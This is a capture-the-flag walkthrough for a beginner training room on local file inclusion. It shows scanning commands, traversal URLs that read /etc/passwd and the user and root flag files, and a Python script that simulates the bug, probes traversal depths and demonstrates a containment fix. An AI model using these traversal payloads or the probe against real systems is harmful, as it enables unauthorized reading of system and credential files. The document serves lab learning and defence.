TryHackMe CTF: inclusion (Easy)

Exploits a simple Local File Inclusion (LFI) vulnerability in the name parameter of a web application's /article endpoint to read arbitrary files from the host. Uses directory traversal (../../../../) to read /etc/passwd for user enumeration, then reads both the user flag and the root flag files directly through the same parameter.

URL: https://tryhackme.com/room/inclusion   Easy

PHASE 1: Reconnaissance

Description of the room:

This is a beginner level room designed for people who want to get familiar with Local file inclusion vulnerability.

If you have any kind of feedback please reach out to me on twitter at 0xmzfr

PHASE 2: Scanning & Enumeration

Running: nmap

Ran the following:

nmap -sC -sV xxx.xxx.xxx.xxx

Interesting ports found to be open:

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack
80/tcp open  http    syn-ack

Also see: nmap.log

Running: gobuster

Ran the following:

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -u http://xxx.xxx.xxx.xxx

Interesting folders found:

/article              (Status: 500) [Size: 290]

See also: gobuster.log

PHASE 3: Gaining Access

What we discover is that the server exposes only one path (/article), and its name argument appears to take a file name, which is the classic shape of a file include.

So we step back up the directory tree with repeated ../ sequences to see if we can get the web server to print out the contents of other interesting files. The exact depth does not matter much: once the path reaches /, any extra ../ is harmless because /.. resolves to / again, so over-shooting is safe and ../../../../ is a reasonable first guess.

STEP 1: Find usernames

http://10.10.110.200/article?name=../../../../etc/passwd

STEP 2: Get unprivileged user flag

http://10.10.110.200/article?name=../../../../home/falconfeast/user.txt

STEP 3: Get root flag

http://10.10.110.200/article?name=../../../../root/root.txt

By using this technique we obtained a valid username (falconfeast) from /etc/passwd, read that user's user.txt, and also stepped into /root to read root.txt. The contents of those two files were the flags for this room. Note that /root is normally mode 0700, so being able to read /root/root.txt through the web application means the server process is running as root (or the file has been made world-readable); either way it is a finding worth reporting on its own.
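The three steps above, as an added example that is not part of the original writeup or of the room's source: a Python script that simulates the vulnerable include against a constructed temporary directory (no network needed), probes traversal depths until the response looks like /etc/passwd, extracts usernames and home directories from it to build the user.txt/root.txt paths, and shows the realpath containment check that closes the hole. The vulnerable_read/hardened_read functions, the sandbox layout and the passwd contents are assumptions made for the demo, not the room's code.

```python
"""Added example: simulated LFI traversal and its fix (not the room's code)."""
import os
import re
import tempfile


def build_sandbox():
    """Constructed stand-in for the target filesystem (assumption, not the room's layout).

    Returns (fake_root, article_dir). The article directory sits three levels below
    the fake root, and an /etc/passwd-style file lives outside it.
    """
    root = tempfile.mkdtemp(prefix="lfi_demo_")
    article_dir = os.path.join(root, "var", "www", "articles")
    os.makedirs(article_dir)
    os.makedirs(os.path.join(root, "etc"))
    with open(os.path.join(article_dir, "hacking.txt"), "w") as f:
        f.write("Article: hacking\n")
    with open(os.path.join(root, "etc", "passwd"), "w") as f:  # constructed sample data
        f.write("root:x:0:0:root:/root:/bin/bash\n"
                "falconfeast:x:1000:1000::/home/falconfeast:/bin/bash\n")
    return root, article_dir


def vulnerable_read(article_dir, name):
    """Models the bug: untrusted 'name' is joined onto the directory with no check,
    so each '../' climbs one level out of article_dir."""
    with open(os.path.join(article_dir, name)) as f:
        return f.read()


def hardened_read(article_dir, name):
    """Fix: resolve the final path and require it to stay inside article_dir."""
    base = os.path.realpath(article_dir)
    target = os.path.realpath(os.path.join(base, name))
    if os.path.commonpath([base, target]) != base:
        raise PermissionError("path escapes article directory: %r" % name)
    with open(target) as f:
        return f.read()


# /etc/passwd always starts with the root entry (uid 0, gid 0).
PASSWD_RE = re.compile(r"^root:[^:]*:0:0:", re.M)


def traversal_payloads(target, max_depth=8):
    """Yield (depth, payload) pairs: ../ repeated 1..max_depth times plus the target."""
    for depth in range(1, max_depth + 1):
        yield depth, "../" * depth + target.lstrip("/")


def find_traversal_depth(read_func, article_dir, target="/etc/passwd", max_depth=8):
    """Step 1 of the writeup: probe increasing depths until the response looks like passwd.
    Returns (depth, payload, body) on success, None if no depth works."""
    for depth, payload in traversal_payloads(target, max_depth):
        try:
            body = read_func(article_dir, payload)
        except (OSError, PermissionError):
            continue  # no file at that depth, or the hardened check refused it
        if PASSWD_RE.search(body):
            return depth, payload, body
    return None


def extract_users(passwd, min_uid=1000):
    """Pull (username, home) for root and regular users; these give the
    /home/<user>/user.txt and /root/root.txt paths for steps 2 and 3."""
    users = []
    for line in passwd.splitlines():
        parts = line.split(":")
        if len(parts) == 7 and parts[2].isdigit():
            uid = int(parts[2])
            if uid == 0 or uid >= min_uid:
                users.append((parts[0], parts[5]))
    return users


if __name__ == "__main__":
    _, art = build_sandbox()
    depth, payload, body = find_traversal_depth(vulnerable_read, art)
    print("vulnerable handler leaked passwd with payload %s (depth %d)" % (payload, depth))
    for user, home in extract_users(body):
        flag = "root.txt" if user == "root" else "user.txt"
        print("  candidate flag path: %s/%s" % (home, flag))
    print("hardened handler:", find_traversal_depth(hardened_read, art))
```

Against a live target you would replace vulnerable_read with a function that fetches http://host/article?name=<payload> and returns the body; the depth probe and passwd regex stay the same. The hardened version rejects every traversal payload because the resolved path no longer shares the article directory as a prefix, which is the check the application was missing.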